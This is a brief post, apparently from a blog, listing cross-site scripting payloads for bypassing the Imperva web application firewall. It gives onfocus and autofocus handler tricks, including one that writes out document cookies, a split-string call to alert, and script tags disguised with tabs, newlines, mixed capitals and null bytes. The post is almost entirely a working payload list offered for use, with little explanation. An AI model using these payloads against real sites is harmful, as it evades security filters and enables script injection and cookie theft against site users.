Our cases for bypass WAF (Imperva)
Payload
- autofocus/onfocus=any() --> onfocus=;var{cookie}=document;write(cookie)
- autofocus/onfocus
- onfocus=any() --> onfocus=;write(cookie)
- onfocus=any() --> onfocus=;Function(`ale`+`rt(domain)`)()
<script>alert(1)</script>
Encoded tabs/newlines/CR
<script	>alert(1)</script>
<script
>alert(1)</script>
<script
>alert(1)</script>
Capital letters
<ScRipT>alert(1)</sCriPt>Adding nullbytes:
<%00script>alert(1)</script>
<script>al%00ert(1)</script>
Comments
Post a Comment